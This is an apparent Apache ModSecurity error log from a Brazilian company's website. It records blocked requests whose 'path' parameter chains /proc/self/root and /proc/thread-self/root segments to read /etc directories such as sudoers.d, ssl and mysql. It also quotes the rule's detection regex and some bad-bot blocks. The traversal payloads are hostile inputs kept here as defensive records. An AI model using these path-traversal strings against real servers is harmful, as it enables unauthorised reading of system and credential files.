[Mon Mar 16 12:55:47.956456 2026] [:error] [pid 21805:tid 140411582465792] [client 74.7.243.203:33626] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/skel"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgoA7ABkC4fWIHEf8HsBQAAAFM"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 12:56:12.234673 2026] [:error] [pid 21806:tid 140411699963648] [client 74.7.241.46:44644] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/wpa_supplicant"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgoHNSswJuvopo3lOhf6wAAAIU"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 12:56:15.884625 2026] [:error] [pid 10651:tid 140411574073088] [client 74.7.241.46:39496] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/wpa_supplicant"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgoH7ysWC90G-1nBrBGZAAAAZQ"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 12:56:51.789642 2026] [:error] [pid 11972:tid 140411725141760] [client 74.7.228.16:33010] [client 74.7.228.16] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abgoQ5qj1wV0Si-Okefu8AAAAAI"]
[Mon Mar 16 12:56:54.839202 2026] [:error] [pid 21806:tid 140411632822016] [client 74.7.241.46:39502] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/dracut.conf.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgoRtSswJuvopo3lOhgFwAAAI0"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 12:57:16.535416 2026] [:error] [pid 11972:tid 140411540502272] [client 74.7.241.46:58354] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/mysql"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgoXJqj1wV0Si-OkefvCQAAABg"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 12:57:29.850957 2026] [:error] [pid 10831:tid 140411574073088] [client 74.7.241.46:58270] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/bash_completion.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgoaY6lpbStxTqkSkttYgAAAlQ"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 12:57:46.019435 2026] [:error] [pid 21533:tid 140411540502272] [client 74.7.241.46:58190] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/binfmt.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgoenjZBu2q05ozVU9Y6gAAAVg"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 12:58:12.289489 2026] [:error] [pid 10772:tid 140411658000128] [client 74.7.243.203:46976] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/ld.so.conf.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgolP9ocpUE4ed4uDzwGgAAAgo"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 12:58:18.263540 2026] [:error] [pid 10651:tid 140411624429312] [client 74.7.243.203:60850] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/cron.monthly"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgomrysWC90G-1nBrBGkQAAAY4"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 12:58:41.488294 2026] [:error] [pid 32654:tid 140411540502272] [client 74.7.241.46:59990] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/zabbix"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgosQlT9VtDQc7bgUyz6gAAARg"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 12:58:44.578237 2026] [:error] [pid 11972:tid 140411624429312] [client 74.7.243.203:60862] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/pm"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgotJqj1wV0Si-OkefvRAAAAA4"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 12:58:46.016965 2026] [:error] [pid 10651:tid 140411741927168] [client 74.7.241.46:40596] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/cron.monthly"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgotrysWC90G-1nBrBGnAAAAYA"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 12:58:52.386945 2026] [:error] [pid 10831:tid 140411590858496] [client 74.7.243.203:53916] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/sudoers.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgovI6lpbStxTqkSkttgQAAAlI"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 12:59:00.679800 2026] [:error] [pid 21946:tid 140411616036608] [client 74.7.243.203:53436] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/firewalld"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgoxHbQATo66fKoS7xRJAAAAM8"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 12:59:03.165658 2026] [:error] [pid 10831:tid 140411691570944] [client 74.7.243.203:41534] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/ssl"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgox46lpbStxTqkSkttkQAAAkY"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 12:59:03.507421 2026] [:error] [pid 21806:tid 140411540502272] [client 74.7.244.31:40186] [client 74.7.244.31] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "www.bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abgox9SswJuvopo3lOhgQgAAAJg"]
[Mon Mar 16 12:59:08.863115 2026] [:error] [pid 10772:tid 140411565680384] [client 74.7.243.203:41536] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/kernel"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgozP9ocpUE4ed4uDzwNQAAAhU"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 12:59:09.846334 2026] [:error] [pid 10831:tid 140411699963648] [client 74.7.241.46:40608] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/bash_completion.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgozY6lpbStxTqkSkttlwAAAkU"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 12:59:17.114012 2026] [:error] [pid 32654:tid 140411658000128] [client 74.7.243.203:34032] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/modsecurity"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgo1QlT9VtDQc7bgUyz-gAAAQo"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 12:59:20.723051 2026] [:error] [pid 21805:tid 140411641214720] [client 74.7.243.203:34042] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/terminfo"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgo2LABkC4fWIHEf8HsSwAAAEw"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 12:59:34.183855 2026] [:error] [pid 21533:tid 140411716749056] [client 74.7.243.203:54104] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/tmpfiles.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgo5njZBu2q05ozVU9ZKAAAAUM"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 12:59:47.611954 2026] [:error] [pid 10709:tid 140411624429312] [client 74.7.243.203:43002] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/ntp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgo8xXjF1vJNtV6CWr3cQAAAc4"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
